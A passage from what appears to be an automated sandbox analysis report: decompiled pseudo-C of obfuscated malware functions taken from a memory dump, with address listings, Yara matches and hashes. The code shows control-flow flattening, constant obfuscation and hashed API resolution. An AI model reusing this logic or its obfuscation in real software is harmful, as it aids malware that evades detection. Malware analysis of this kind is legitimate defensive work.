				_v540 = _v540 ^ 0x0027e576;
				_v496 = 0xee481f;
				_t808 = 0x33;
				_v496 = _v496 * 0x16;
				_t809 = 0x6b;
				_v496 = _v496 / _t808;
				_v496 = _v496 + 0xffff904f;
				_v496 = _v496 ^ 0x00673c1b;
				_v528 = 0x7b550f;
				_v528 = _v528 >> 5;
				_v528 = _v528 | 0x82d55b10;
				_v528 = _v528 << 1;
				_v528 = _v528 ^ 0x05a590f6;
				_v312 = 0x355af7;
				_v312 = _v312 << 0xa;
				_v312 = _v312 ^ 0xd568e6b4;
				_v416 = 0x50c1da;
				_v416 = _v416 + 0xffff3e63;
				_v416 = _v416 << 7;
				_v416 = _v416 ^ 0x2808c0da;
				_v352 = 0x788565;
				_v352 = _v352 << 0xb;
				_v352 = _v352 ^ 0xc42c8c91;
				_v424 = 0x444211;
				_v424 = _v424 ^ 0x494f7f50;
				_v424 = _v424 + 0xffff1346;
				_v424 = _v424 ^ 0x49031dbd;
				_v492 = 0xa142e8;
				_v492 = _v492 / _t809;
				_t810 = 0x14;
				_v492 = _v492 / _t810;
				_t811 = 0x21;
				_v492 = _v492 * 0x18;
				_v492 = _v492 ^ 0x00042e76;
				_v336 = 0xd9ae2c;
				_v336 = _v336 | 0x39c0196c;
				_v336 = _v336 ^ 0x39d2ae46;
				_v344 = 0x2d620e;
				_v344 = _v344 * 0x32;
				_v344 = _v344 ^ 0x08d7e910;
				_v400 = 0xcb12f4;
				_v400 = _v400 >> 0x10;
				_v400 = _v400 + 0xffff3b1e;
				_v400 = _v400 ^ 0xfffe3ac8;
				_v408 = 0x96e27b;
				_v408 = _v408 | 0xfd2a95fa;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0x7de6200f;
				_v392 = 0xd8cfb0;
				_v392 = _v392 * 0x1b;
				_t714 = _v296;
				_v392 = _v392 / _t811;
				_v392 = _v392 ^ 0x00b38f79;
				_v328 = 0x749801;
				_v328 = _v328 | 0x8fe0b18f;
				_v328 = _v328 ^ 0x8ffad11a;
				_v476 = 0x8564d4;
				_v476 = _v476 << 0xa;
				_t483 =  &_v476; // 0xa
				_t812 = 0x7a;
				_t824 = _v296;
				_v476 =  *_t483 / _t812;
				_t490 =  &_v476; // 0xa
				_t813 = _v296;
				_v476 =  *_t490 * 0x26;
				_v476 = _v476 ^ 0x06b05b0a;
				_v484 = 0xd8d973;
				_v484 = _v484 << 6;
				_v484 = _v484 | 0xfddb9f7b;
				_v484 = _v484 ^ 0xfff3c4d3;
				_v320 = 0xfbd867;
				_v320 = _v320 >> 5;
				_v320 = _v320 ^ 0x000f339c;
				_v468 = 0xc51dfd;
				_v468 = _v468 << 8;
				_v468 = _v468 >> 7;
				_v468 = _v468 ^ 0x4728b7d1;
				_v468 = _v468 ^ 0x46a9f958;
				while(1) {
					L1:
					while(1) {
						_t829 = _t817 - 0x815e78c;
						if(_t829 <= 0) {
						}
						L3:
						if(_t829 == 0) {
							E01122C81(_v496,  *_t720, _v528, _t714, _v312,  *((intOrPtr*)(_t720 + 4)));
							_t720 = _v500;
							_t825 =  &(_t825[4]);
							_t668 = _v560;
							_t817 = 0xca82f1;
							_t714 = _t714 +  *((intOrPtr*)(_t720 + 4));
							L14:
							_t780 = 0x99540a6;
							continue;
							do {
								while(1) {
									_t829 = _t817 - 0x815e78c;
									if(_t829 <= 0) {
									}
									goto L19;
								}
								goto L3;
								L31:
								__eflags = _t817 - 0xec6b752;
							} while (_t817 != 0xec6b752);
							L32:
							return _v560;
						}
						if(_t817 == 0x3da101) {
							E0110AE43(_t668, _v320, _v468);
							return 0;
						}
						if(_t817 == 0xca82f1) {
							_push(_v492);
							_push(_v424);
							_push(_v352);
							_t687 = E01113CC9(_v336, __eflags,  &_v256, _v292 - _t714, _v344, E0110387F(_v416, 0x11015fc), _v400, _v408);
							E0111629F(_v392, _t683, _v328, _v476, _v484);
							_t689 = _v296;
							 *_t689 = _t824;
							 *((intOrPtr*)(_t689 + 4)) = _t714 + _t687 - _t824;
							goto L32;
						}
						if(_t817 == 0x1162a32) {
							_t821 =  &_v256;
							_push(_t720);
							_push(0x10);
							_t794 = 8;
							_t795 = E01102C02(_t794);
							_t694 = _v308;
							_pop(0);
							__eflags = _t694 - _t795;
							if(_t694 < _t795) {
								_t798 = _t795 - _t694;
								_t814 = _t821;
								_t741 = _t798 >> 1;
								__eflags = _t741;
								_t700 = memset(_t814, 0x2d002d, _t741 << 2);
								asm("adc ecx, ecx");
								_t821 = _t821 + _t798 * 2;
								memset(_t814 + _t741, _t700, 0);
								_t825 =  &(_t825[6]);
							}
							_push(0);
							_push(0x10);
							_t796 = 8;
							_t697 = E01102C02(_t796);
							_push(_v472);
							_t813 = _t697;
							_push(_t821);
							_push(0xb);
							_push(_v388);
							E01104A97(_t813, _v364);
							_t817 = 0x89cda0d;
							L11:
							_t825 =  &(_t825[6]);
							L12:
							_t668 = _v560;
							L13:
							_t720 = _v500;
							goto L14;
						}
						if(_t817 == 0x1fa8b82) {
							__eflags = 1;
							_push(_t720);
							_t704 = E01102C02(1, 8);
							_push(_v452);
							_t813 = _t704;
							_push( &_v288);
							_push(9);
							_push(_v504);
							E01104A97(_t813, _v380);
							_t817 = 0xbf850a1;
							goto L11;
						}
						if(_t817 != 0x3d03c9c) {
							goto L31;
						}
						_t813 = _t813 +  *((intOrPtr*)(_t720 + 4));
						_push(_t720);
						_push(_t720);
						_t711 = E01115212(_t813);
						_t720 = _v500;
						_t824 = _t711;
						_t825 =  &(_t825[3]);
						_t780 = 0x99540a6;
						_t817 =  !=  ? 0x99540a6 : 0x3da101;
						goto L1;
						L19:
						__eflags = _t817 - 0x89cda0d;
						if(_t817 == 0x89cda0d) {
							_t813 = 0x4000;
							_push(0x4000);
							_push(0x4000);
							_t662 = E01115212(0x4000);
							_t825 =  &(_t825[3]);
							_v560 = _t662;
							__eflags = _t662;
							if(_t662 == 0) {
								_t720 = _v500;
								_t817 = 0xec6b752;
								_t780 = 0x99540a6;
								goto L31;
							}
							_t817 = 0xb90b7dd;
							goto L13;
						}
						__eflags = _t817 - _t780;
						if(_t817 == _t780) {
							_push(_v556);
							_push(_v340);
							_v292 = _t813 + _t824;
							_push(_v552);
							_t570 =  &_v548; // 0x27e576
							_t714 = E0111360D( &_v288, __eflags,  &_v128, _v376, _v440, _v384,  &_v256, _t824, _v332, _v304, E0110387F( *_t570, 0x11016ec), _v464) + _t824;
							E0111629F(_v432, _t663, _v368, _v532, _v540);
							_t825 =  &(_t825[0x10]);
							_t817 = 0x815e78c;
							goto L12;
						}
						__eflags = _t817 - 0xb90b7dd;
						if(__eflags == 0) {
							_push(_v412);
							_push(_v428);
							_t669 = E0111CD35(0x11016ac, _v520, __eflags);
							_push( &_v256);
							_push(_t669);
							_push(_t813);
							_push(_v560);
							 *((intOrPtr*)(E01107DE3(_t727, 0xa92f64b6, 0x185)))();
							E0111629F(_v300, _t669, _v480, _v456, _v460);
							_t825 =  &(_t825[7]);
							_t817 = 0x3d03c9c;
							goto L12;
						}
						__eflags = _t817 - 0xbf850a1;
						if(_t817 == 0xbf850a1) {
							_push(_t720);
							_push(0x10);
							_t787 = 4;
							_t677 = E01102C02(_t787);
							_push(_v348);
							_t813 = _t677;
							_push( &_v128);
							_push(0xb);
							_push(_v404);
							E01104A97(_t813, _v436);
							_t817 = 0x1162a32;
							goto L11;
						}
						__eflags = _t817 - 0xea2f645;
						if(_t817 != 0xea2f645) {
							goto L31;
						}
						_t817 = 0x1fa8b82;
					}
				}
			}




















































































































                          0x01111591
                          0x0111159b
                          0x011115a2
                          0x011115a6
                          0x011115b1
                          0x011115bb
                          0x011115bc
                          0x011115c3
                          0x011115c8
                          0x011115d0
                          0x011115d5
                          0x011115dd
                          0x011115e5
                          0x011115ed
                          0x011115f8
                          0x01111603
                          0x0111160e
                          0x01111619
                          0x01111624
                          0x0111162f
                          0x0111163e
                          0x01111640
                          0x01111643
                          0x01111647
                          0x0111164f
                          0x01111654
                          0x0111165c
                          0x01111667
                          0x0111167d
                          0x01111684
                          0x0111168f
                          0x011116a2
                          0x011116a5
                          0x011116ac
                          0x011116b7
                          0x011116ca
                          0x011116d1
                          0x011116dc
                          0x011116f2
                          0x011116f9
                          0x01111701
                          0x0111170c
                          0x01111717
                          0x0111172a
                          0x01111731
                          0x0111173c
                          0x01111747
                          0x01111752
                          0x0111175d
                          0x01111769
                          0x0111176c
                          0x01111770
                          0x01111775
                          0x0111177d
                          0x01111785
                          0x01111790
                          0x011117a3
                          0x011117aa
                          0x011117b5
                          0x011117c0
                          0x011117cd
                          0x011117d8
                          0x011117e3
                          0x011117ee
                          0x011117f9
                          0x01111804
                          0x01111818
                          0x0111181d
                          0x01111826
                          0x01111831
                          0x01111843
                          0x01111848
                          0x01111851
                          0x0111185c
                          0x01111864
                          0x0111186c
                          0x01111874
                          0x0111187c
                          0x01111884
                          0x0111188c
                          0x01111894
                          0x01111899
                          0x011118a1
                          0x011118a9
                          0x011118b4
                          0x011118bb
                          0x011118c6
                          0x011118ce
                          0x011118d3
                          0x011118dc
                          0x011118e1
                          0x011118e7
                          0x011118ef
                          0x011118fb
                          0x011118fe
                          0x01111902
                          0x0111190a
                          0x0111190f
                          0x01111917
                          0x0111191f
                          0x01111924
                          0x01111929
                          0x01111931
                          0x01111939
                          0x01111944
                          0x0111194f
                          0x0111195a
                          0x01111965
                          0x01111970
                          0x01111978
                          0x01111980
                          0x0111198b
                          0x01111996
                          0x011119a1
                          0x011119ac
                          0x011119b4
                          0x011119bc
                          0x011119c4
                          0x011119c9
                          0x011119d1
                          0x011119d9
                          0x011119de
                          0x011119e6
                          0x011119ee
                          0x011119f6
                          0x011119fd
                          0x01111a02
                          0x01111a0a
                          0x01111a15
                          0x01111a1d
                          0x01111a25
                          0x01111a30
                          0x01111a38
                          0x01111a3d
                          0x01111a45
                          0x01111a4d
                          0x01111a55
                          0x01111a60
                          0x01111a72
                          0x01111a73
                          0x01111a7a
                          0x01111a85
                          0x01111a8d
                          0x01111a92
                          0x01111a97
                          0x01111a9c
                          0x01111aa4
                          0x01111aac
                          0x01111ab4
                          0x01111ac1
                          0x01111ac5
                          0x01111acd
                          0x01111add
                          0x01111ae6
                          0x01111aea
                          0x01111aef
                          0x01111af7
                          0x01111b0a
                          0x01111b11
                          0x01111b1c
                          0x01111b24
                          0x01111b2c
                          0x01111b34
                          0x01111b3c
                          0x01111b44
                          0x01111b4f
                          0x01111b5a
                          0x01111b65
                          0x01111b70
                          0x01111b78
                          0x01111b83
                          0x01111b8e
                          0x01111ba2
                          0x01111ba9
                          0x01111bb4
                          0x01111bbf
                          0x01111bca
                          0x01111bd5
                          0x01111be0
                          0x01111beb
                          0x01111bf6
                          0x01111bfe
                          0x01111c03
                          0x01111c0b
                          0x01111c13
                          0x01111c1e
                          0x01111c29
                          0x01111c34
                          0x01111c3f
                          0x01111c47
                          0x01111c52
                          0x01111c60
                          0x01111c67
                          0x01111c6d
                          0x01111c75
                          0x01111c7d
                          0x01111c85
                          0x01111c8d
                          0x01111c95
                          0x01111c9d
                          0x01111ca2
                          0x01111caa
                          0x01111cb7
                          0x01111cba
                          0x01111cc4
                          0x01111cc5
                          0x01111ccb
                          0x01111cd3
                          0x01111cdb
                          0x01111ce3
                          0x01111ce8
                          0x01111cf0
                          0x01111cf4
                          0x01111cfc
                          0x01111d07
                          0x01111d0f
                          0x01111d1a
                          0x01111d25
                          0x01111d30
                          0x01111d38
                          0x01111d43
                          0x01111d4e
                          0x01111d56
                          0x01111d61
                          0x01111d6c
                          0x01111d77
                          0x01111d82
                          0x01111d8d
                          0x01111d9d
                          0x01111da7
                          0x01111dac
                          0x01111db5
                          0x01111db6
                          0x01111dba
                          0x01111dc2
                          0x01111dcd
                          0x01111dd8
                          0x01111de3
                          0x01111df6
                          0x01111dfd
                          0x01111e08
                          0x01111e13
                          0x01111e1b
                          0x01111e26
                          0x01111e31
                          0x01111e3c
                          0x01111e47
                          0x01111e4f
                          0x01111e5a
                          0x01111e6f
                          0x01111e81
                          0x01111e88
                          0x01111e8f
                          0x01111e9a
                          0x01111ea5
                          0x01111eb0
                          0x01111ebb
                          0x01111ec3
                          0x01111ec8
                          0x01111ece
                          0x01111ed1
                          0x01111edd
                          0x01111ee1
                          0x01111ee6
                          0x01111eed
                          0x01111ef1
                          0x01111ef9
                          0x01111f01
                          0x01111f06
                          0x01111f0e
                          0x01111f16
                          0x01111f21
                          0x01111f29
                          0x01111f34
                          0x01111f3c
                          0x01111f41
                          0x01111f46
                          0x01111f4e
                          0x01111f56
                          0x01111f56
                          0x01111f5a
                          0x01111f5a
                          0x01111f60
                          0x01111f60
                          0x01111f66
                          0x01111f66
                          0x011120d0
                          0x011120d5
                          0x011120d9
                          0x011120dc
                          0x011120e0
                          0x011120e5
                          0x0111202d
                          0x0111202d
                          0x01112032
                          0x01111f5a
                          0x01111f5a
                          0x01111f5a
                          0x01111f60
                          0x01111f60
                          0x00000000
                          0x01111f60
                          0x00000000
                          0x011122c4
                          0x011122c4
                          0x011122c4
                          0x011122d0
                          0x00000000
                          0x011122d0
                          0x01111f72
                          0x01112382
                          0x00000000
                          0x01112388
                          0x01111f7e
                          0x011122df
                          0x011122e8
                          0x011122ef
                          0x01112335
                          0x0111235a
                          0x0111235f
                          0x0111236b
                          0x0111236d
                          0x00000000
                          0x0111236d
                          0x01111f8a
                          0x0111203e
                          0x01112049
                          0x0111204a
                          0x0111204e
                          0x01112054
                          0x01112056
                          0x0111205e
                          0x0111205f
                          0x01112061
                          0x01112063
                          0x01112065
                          0x0111206e
                          0x0111206e
                          0x01112070
                          0x01112072
                          0x01112074
                          0x01112077
                          0x01112077
                          0x01112077
                          0x01112088
                          0x01112089
                          0x0111208d
                          0x0111208e
                          0x01112093
                          0x01112097
                          0x01112099
                          0x0111209a
                          0x0111209c
                          0x011120ac
                          0x011120b1
                          0x01112022
                          0x01112022
                          0x01112025
                          0x01112025
                          0x01112029
                          0x01112029
                          0x00000000
                          0x01112029
                          0x01111f96
                          0x01111fef
                          0x01111ff0
                          0x01111ff3
                          0x01111ff8
                          0x01111fff
                          0x01112008
                          0x01112009
                          0x0111200b
                          0x01112018
                          0x0111201d
                          0x00000000
                          0x0111201d
                          0x01111f9e
                          0x00000000
                          0x00000000
                          0x01111faf
                          0x01111fbd
                          0x01111fbe
                          0x01111fc0
                          0x01111fc5
                          0x01111fc9
                          0x01111fcb
                          0x01111fd5
                          0x01111fda
                          0x00000000
                          0x011120ed
                          0x011120ed
                          0x011120f3
                          0x0111228c
                          0x01112299
                          0x0111229a
                          0x0111229c
                          0x011122a1
                          0x011122a4
                          0x011122a8
                          0x011122aa
                          0x011122b6
                          0x011122ba
                          0x011122bf
                          0x00000000
                          0x011122bf
                          0x011122ac
                          0x00000000
                          0x011122ac
                          0x011120f9
                          0x011120fb
                          0x011121e0
                          0x011121ec
                          0x011121f3
                          0x011121fa
                          0x011121fe
                          0x0111225c
                          0x0111226d
                          0x01112272
                          0x01112275
                          0x00000000
                          0x01112275
                          0x01112101
                          0x01112107
                          0x01112172
                          0x0111217e
                          0x01112189
                          0x0111219e
                          0x011121a3
                          0x011121a4
                          0x011121a5
                          0x011121b1
                          0x011121ce
                          0x011121d3
                          0x011121d6
                          0x00000000
                          0x011121d6
                          0x01112109
                          0x0111210f
                          0x01112135
                          0x01112136
                          0x0111213a
                          0x0111213b
                          0x01112140
                          0x01112147
                          0x01112150
                          0x01112151
                          0x01112153
                          0x01112163
                          0x01112168
                          0x00000000
                          0x01112168
                          0x01112111
                          0x01112117
                          0x00000000
                          0x00000000
                          0x0111211d
                          0x0111211d
                          0x01111f5a

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^"}w$5?T$YH$^"}w$`Q$c5S1$ky$v'$9
                          • API String ID: 0-441490596
                          • Opcode ID: 8ffad53473609ee8fb6cad671bf837e576f35481bbc13edb103d13d0af703fa8
                          • Instruction ID: 3ebb5f5bdaf5d656f090ea0c86c5aca64ebe3d2f97f14988fe707a846977d252
                          • Opcode Fuzzy Hash: 8ffad53473609ee8fb6cad671bf837e576f35481bbc13edb103d13d0af703fa8
                          • Instruction Fuzzy Hash: 1C6200715083818FD379CF25C489B8FFBE2BBD4358F108A2DE59A96260D7B59849CB43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011140FE, Relevance: 11.6, Strings: 9, Instructions: 319COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E011140FE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t331;
				void* _t375;
				signed int _t382;
				void* _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int* _t416;

				_push(_a12);
				_t407 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0110358A(_t331);
				_v1680 = 0xecc6df;
				_t416 =  &(( &_v1708)[5]);
				_t375 = 0x2bbbb5c;
				_t408 = 0x4f;
				_v1680 = _v1680 / _t408;
				_t409 = 0x69;
				_v1680 = _v1680 / _t409;
				_t410 = 0x29;
				_v1680 = _v1680 / _t410;
				_v1680 = _v1680 ^ 0x00000004;
				_v1672 = 0xf0f001;
				_v1672 = _v1672 << 5;
				_v1672 = _v1672 + 0xae5;
				_v1672 = _v1672 << 9;
				_v1672 = _v1672 ^ 0x3c166f75;
				_v1592 = 0xef70fc;
				_v1592 = _v1592 ^ 0x00e587e5;
				_v1600 = 0xc7a853;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x003a93a3;
				_v1604 = 0x8b40bb;
				_v1604 = _v1604 + 0xfffff760;
				_v1604 = _v1604 ^ 0x008a5254;
				_v1700 = 0x24f303;
				_v1700 = _v1700 << 0xd;
				_v1700 = _v1700 + 0x1ce0;
				_v1700 = _v1700 ^ 0x887eb559;
				_v1700 = _v1700 ^ 0x161c5beb;
				_v1668 = 0x1c09b;
				_v1668 = _v1668 + 0xffff9686;
				_t411 = 0x5a;
				_v1668 = _v1668 * 0x4f;
				_v1668 = _v1668 | 0x6f375f79;
				_v1668 = _v1668 ^ 0x6f732305;
				_v1648 = 0x526155;
				_t68 =  &_v1648; // 0x526155
				_v1648 =  *_t68 / _t411;
				_t74 =  &_v1648; // 0x526155
				_v1648 =  *_t74 * 0x60;
				_v1648 = _v1648 ^ 0x0055ba2e;
				_v1568 = 0x4a97ea;
				_v1568 = _v1568 + 0x2d7f;
				_v1568 = _v1568 ^ 0x00446384;
				_v1624 = 0xc328b6;
				_v1624 = _v1624 >> 6;
				_v1624 = _v1624 << 6;
				_v1624 = _v1624 ^ 0x00caf265;
				_v1676 = 0x3bb87e;
				_v1676 = _v1676 + 0xffff6c80;
				_v1676 = _v1676 + 0xffff9524;
				_v1676 = _v1676 + 0xb2c3;
				_v1676 = _v1676 ^ 0x00310521;
				_v1640 = 0x4e39af;
				_v1640 = _v1640 + 0xdee0;
				_v1640 = _v1640 + 0xffffeea0;
				_v1640 = _v1640 ^ 0x0045c51b;
				_v1596 = 0x52ccd5;
				_v1596 = _v1596 + 0xffff320b;
				_v1596 = _v1596 ^ 0x005c4e46;
				_v1616 = 0xf0f3d9;
				_v1616 = _v1616 + 0xffff715e;
				_t412 = 0x3f;
				_v1616 = _v1616 * 0x30;
				_v1616 = _v1616 ^ 0x2d12086a;
				_v1660 = 0x386db;
				_v1660 = _v1660 + 0xffff8cc4;
				_v1660 = _v1660 + 0x498d;
				_v1660 = _v1660 + 0x2c05;
				_v1660 = _v1660 ^ 0x00039de5;
				_v1632 = 0xb94b21;
				_v1632 = _v1632 + 0xffff4c5b;
				_v1632 = _v1632 | 0xe8e62b69;
				_v1632 = _v1632 ^ 0xe8ff0f89;
				_v1608 = 0x9c5f73;
				_v1608 = _v1608 | 0x895c27c8;
				_v1608 = _v1608 ^ 0x89d87d16;
				_v1692 = 0xe8cb31;
				_v1692 = _v1692 * 0x48;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 ^ 0x0006842c;
				_v1708 = 0xfe5917;
				_v1708 = _v1708 | 0xb795fffe;
				_v1708 = _v1708 + 0xffff65ed;
				_v1708 = _v1708 ^ 0xb7f6fe94;
				_v1652 = 0xd35f26;
				_v1652 = _v1652 >> 8;
				_v1652 = _v1652 + 0xffffa85d;
				_v1652 = _v1652 ^ 0x000fd654;
				_v1684 = 0x27517b;
				_v1684 = _v1684 + 0xb977;
				_v1684 = _v1684 >> 0xd;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 ^ 0x000ec1c8;
				_v1636 = 0x26e56b;
				_v1636 = _v1636 >> 4;
				_v1636 = _v1636 + 0xb334;
				_v1636 = _v1636 ^ 0x000b354a;
				_v1696 = 0x89fe17;
				_v1696 = _v1696 + 0xffffbbc1;
				_v1696 = _v1696 ^ 0x5075d2e6;
				_v1696 = _v1696 | 0x813b6067;
				_v1696 = _v1696 ^ 0xd1f21b8c;
				_v1564 = 0x14e340;
				_v1564 = _v1564 * 0x12;
				_v1564 = _v1564 ^ 0x01745609;
				_v1644 = 0x6df290;
				_v1644 = _v1644 | 0xf494ce0e;
				_v1644 = _v1644 + 0xb612;
				_v1644 = _v1644 ^ 0xf4ff3c1d;
				_v1704 = 0x9cf2ce;
				_v1704 = _v1704 + 0x46da;
				_v1704 = _v1704 + 0xffffda6c;
				_v1704 = _v1704 | 0x89d54bb7;
				_v1704 = _v1704 ^ 0x89d09b04;
				_v1588 = 0x49e131;
				_t209 =  &_v1588; // 0x49e131
				_v1588 =  *_t209 / _t412;
				_v1588 = _v1588 ^ 0x000d8a6e;
				_v1572 = 0x93642;
				_t218 =  &_v1572; // 0x93642
				_v1572 =  *_t218 * 0x39;
				_v1572 = _v1572 ^ 0x0209c809;
				_v1580 = 0x50d007;
				_v1580 = _v1580 | 0x2637a38d;
				_v1580 = _v1580 ^ 0x2675adab;
				_v1688 = 0x9d1e8f;
				_v1688 = _v1688 + 0x8b64;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0xc479de2b;
				_v1688 = _v1688 ^ 0x293a1d3c;
				_v1620 = 0x2368c2;
				_v1620 = _v1620 ^ 0x12e92793;
				_v1620 = _v1620 + 0xffffecf1;
				_v1620 = _v1620 ^ 0x12cded03;
				_v1628 = 0xbb0a3e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 | 0x8e0ba2db;
				_v1628 = _v1628 ^ 0xbeace13e;
				_v1576 = 0x861d4d;
				_v1576 = _v1576 + 0xffffc741;
				_v1576 = _v1576 ^ 0x008649c7;
				_v1612 = 0x27acf0;
				_v1612 = _v1612 * 0x11;
				_v1612 = _v1612 + 0x5464;
				_v1612 = _v1612 ^ 0x02ab43ea;
				_v1656 = 0xee29c8;
				_v1656 = _v1656 ^ 0x7fc9f939;
				_v1656 = _v1656 << 6;
				_v1656 = _v1656 * 0x35;
				_v1656 = _v1656 ^ 0xcf9fbfa9;
				_v1664 = 0xf6dd0c;
				_v1664 = _v1664 * 0x73;
				_v1664 = _v1664 | 0xdfbb7ddf;
				_v1664 = _v1664 ^ 0xfff795d4;
				_v1584 = 0x8afb45;
				_v1584 = _v1584 ^ 0x186a0676;
				_v1584 = _v1584 ^ 0x18ecce65;
				L1:
				while(_t375 != 0x2bbbb5c) {
					if(_t375 == 0x5f559ea) {
						_push(_v1684);
						_push(_v1652);
						_t413 = E0111CD35(0x1101130, _v1708, __eflags);
						E011223F2( &_v1560, __eflags);
						E0111BEAA(_v1636, __eflags,  &_v520,  &_v1560, _v1696,  &_v1040, _v1564, _v1644, _v1704, _v1588, _t407,  *0x1125218 + 0x18, _t355, _v1572,  *0x1125218 + 0x234);
						_push(_v1628);
						_push(_v1620);
						_push(_v1688);
						_t382 = _v1580;
						L8:
						E0111629F(_t382, _t413);
						_t416 =  &(_t416[0x10]);
						_t375 = 0xff417d9;
						continue;
					}
					if(_t375 == 0x8158fbb) {
						_push(_v1648);
						_push(_v1668);
						_t413 = E0111CD35(0x1101020, _v1700, __eflags);
						E011223F2( &_v1560, __eflags);
						__eflags =  *0x1125218 + 0x234;
						E0111E35F( *0x1125218 + 0x18,  *0x1125218 + 0x234, _v1568, _v1624, _v1676, 0x104, _v1640,  &_v520,  &_v1560, _t365, _v1596,  *0x1125218 + 0x234, _v1616);
						_push(_v1692);
						_push(_v1608);
						_push(_v1632);
						_t382 = _v1660;
						goto L8;
					}
					if(_t375 == 0xff417d9) {
						_push(_t375);
						__eflags = E0111EA55( &_v520, _v1576, __eflags, _v1612, _t407, _v1656, _t407, _v1664, _v1584, _t407);
						_t407 =  !=  ? 1 : _t407;
					} else {
						if(_t375 != 0x299b4b9) {
							continue;
						} else {
						}
					}
					return _t407;
				}
				E0110B3B4(_v1672, _t375, _v1592, _t375, _v1600,  &_v1040, _v1604, _v1680);
				_t416 =  &(_t416[7]);
				_t375 = 0x8158fbb;
				goto L1;
			}





















































                          0x01114108
                          0x0111410f
                          0x01114111
                          0x01114118
                          0x0111411f
                          0x01114120
                          0x01114121
                          0x01114126
                          0x0111412e
                          0x01114137
                          0x0111413e
                          0x01114143
                          0x0111414d
                          0x01114152
                          0x0111415c
                          0x01114161
                          0x01114167
                          0x0111416c
                          0x01114174
                          0x01114179
                          0x01114181
                          0x01114186
                          0x0111418e
                          0x011141a7
                          0x011141b2
                          0x011141bd
                          0x011141c5
                          0x011141d0
                          0x011141d8
                          0x011141e0
                          0x011141e8
                          0x011141f0
                          0x011141f5
                          0x011141fd
                          0x01114205
                          0x0111420d
                          0x01114215
                          0x01114222
                          0x01114223
                          0x01114227
                          0x0111422f
                          0x01114237
                          0x0111423f
                          0x01114245
                          0x01114249
                          0x0111424e
                          0x01114252
                          0x0111425a
                          0x01114265
                          0x01114270
                          0x0111427b
                          0x01114283
                          0x01114288
                          0x0111428d
                          0x01114295
                          0x0111429d
                          0x011142a5
                          0x011142ad
                          0x011142b5
                          0x011142bd
                          0x011142c7
                          0x011142cf
                          0x011142d7
                          0x011142df
                          0x011142ea
                          0x011142f5
                          0x01114300
                          0x01114308
                          0x01114317
                          0x01114318
                          0x0111431c
                          0x01114324
                          0x0111432c
                          0x01114334
                          0x0111433c
                          0x01114344
                          0x0111434c
                          0x01114354
                          0x0111435c
                          0x01114364
                          0x0111436c
                          0x01114374
                          0x0111437c
                          0x01114384
                          0x01114391
                          0x01114395
                          0x0111439a
                          0x0111439f
                          0x011143a7
                          0x011143af
                          0x011143b7
                          0x011143bf
                          0x011143c7
                          0x011143cf
                          0x011143d4
                          0x011143dc
                          0x011143e4
                          0x011143ec
                          0x011143f4
                          0x011143f9
                          0x011143fe
                          0x01114406
                          0x0111440e
                          0x01114413
                          0x0111441b
                          0x01114423
                          0x0111442b
                          0x01114433
                          0x0111443b
                          0x01114443
                          0x0111444b
                          0x0111445e
                          0x01114465
                          0x01114470
                          0x01114478
                          0x01114480
                          0x01114488
                          0x01114490
                          0x01114498
                          0x011144a0
                          0x011144a8
                          0x011144b0
                          0x011144b8
                          0x011144c3
                          0x011144cc
                          0x011144d3
                          0x011144de
                          0x011144e9
                          0x011144f1
                          0x011144f8
                          0x01114503
                          0x0111450e
                          0x01114519
                          0x01114524
                          0x0111452c
                          0x01114539
                          0x01114543
                          0x0111454b
                          0x01114553
                          0x0111455b
                          0x01114563
                          0x0111456b
                          0x01114573
                          0x0111457b
                          0x01114580
                          0x01114588
                          0x01114590
                          0x0111459b
                          0x011145a6
                          0x011145b1
                          0x011145be
                          0x011145c2
                          0x011145ca
                          0x011145d2
                          0x011145da
                          0x011145e2
                          0x011145ec
                          0x011145f0
                          0x011145f8
                          0x01114605
                          0x01114609
                          0x01114611
                          0x01114619
                          0x01114624
                          0x0111462f
                          0x00000000
                          0x0111463a
                          0x0111464c
                          0x01114710
                          0x01114719
                          0x0111472f
                          0x01114731
                          0x0111478c
                          0x01114791
                          0x01114798
                          0x0111479f
                          0x011147a3
                          0x011146ff
                          0x01114701
                          0x01114706
                          0x01114709
                          0x00000000
                          0x01114709
                          0x01114654
                          0x0111466b
                          0x01114674
                          0x01114688
                          0x0111468a
                          0x0111469f
                          0x011146e1
                          0x011146e6
                          0x011146ea
                          0x011146f1
                          0x011146f8
                          0x00000000
                          0x011146f8
                          0x01114658
                          0x011147e2
                          0x01114815
                          0x01114817
                          0x0111465e
                          0x01114664
                          0x00000000
                          0x00000000
                          0x01114666
                          0x01114664
                          0x01114826
                          0x01114826
                          0x011147d3
                          0x011147d8
                          0x011147db
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1I$B6$FN\$UaR$dT$i+$k&$y_7o${Q'
